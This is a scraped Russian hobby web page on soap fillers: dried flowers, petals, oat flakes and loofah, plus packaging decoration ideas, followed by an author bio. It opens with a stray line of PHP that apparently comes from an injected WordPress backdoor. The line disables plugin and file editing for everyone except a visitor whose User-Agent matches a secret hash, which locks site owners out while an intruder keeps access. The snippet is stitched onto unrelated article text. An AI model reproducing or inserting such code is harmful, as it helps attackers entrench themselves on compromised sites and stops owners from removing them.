if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Наполнители для мыла | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Наполнители для мыла

Наполнители можно использовать как для украшения и оформления упаковки, так и добавлять в мыльную основу

Наполнители для мыла Наполнители для мыла

Напол­ни­те­ли мож­но исполь­зо­вать как для укра­ше­ния и оформ­ле­ния упа­ков­ки, так и добав­лять в мыль­ную основу.

Чаще все­го при­ме­ня­ют сухо­цве­ты. Сто­ит обра­тить вни­ма­ние на то, что рас­ти­тель­ные ком­по­нен­ты (при добав­ле­нии в мыло) мож­но исполь­зо­вать толь­ко в высу­шен­ном виде, ина­че све­жие лепест­ки могут испор­тить­ся, заплес­не­веть и при­дать допол­ни­тель­ную неже­ла­тель­ную окрас­ку осно­ве со временем.

Так­же в осно­ву мож­но добав­лять лепест­ки роз, василь­ка, мяты, гор­чич­ные зер­на, овся­ные хло­пья и мно­гое дру­гое. Все будет зави­сеть от Вашей фантазии.

Добав­ля­ют­ся сухо­цве­ты как в осно­ву, так и на поверх­ность уже гото­во­го мыла, при­да­вая опре­де­лен­ный шарм брус­кам. Так­же мыло мож­но обсы­пать деко­ра­тив­ны­ми бусин­ка­ми или посып­кой в виде сер­де­чек, звез­до­чек и другого.

В изго­тов­ле­нии дет­ско­го мыла часто исполь­зу­ют водо­рас­тво­ри­мые кар­тин­ки, кото­рые обя­за­тель­но пора­ду­ют малень­ких мойдодырчиков.

Мод­ным, ори­ги­наль­ным и полез­ным напол­ни­те­лем счи­та­ет­ся люфа, обла­да­ю­щая анти­цел­люлит­ным и скра­бя­щим эффек­том. Про­зрач­ное мыло с ней все­гда будет выгля­деть потрясающе!

Напол­ни­те­лей для оформ­ле­ния упа­ков­ки суще­ству­ет еще боль­ше. Высу­шен­ные доль­ки апель­си­на, лимо­на, лай­ма при­да­дут ори­ги­наль­ное цит­ру­со­вое настро­е­ние подар­ку. Стек­лян­ные шари­ки и звез­доч­ки, ракуш­ки подой­дут для набо­ра мыла с аро­ма­том мор­ско­го бри­за. Аро­ма­ти­зи­ро­ван­ные палоч­ки вани­ли и сан­да­ла, звез­ды ани­са доба­вят роман­тич­но­сти. Дере­вен­ское мыло из козье­го моло­ка, меда, дег­тя, луго­вых трав укра­ша­ют соло­мой, меш­ко­вин­ной или льня­ной тка­нью, поле­вым гербарием.

 

 


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!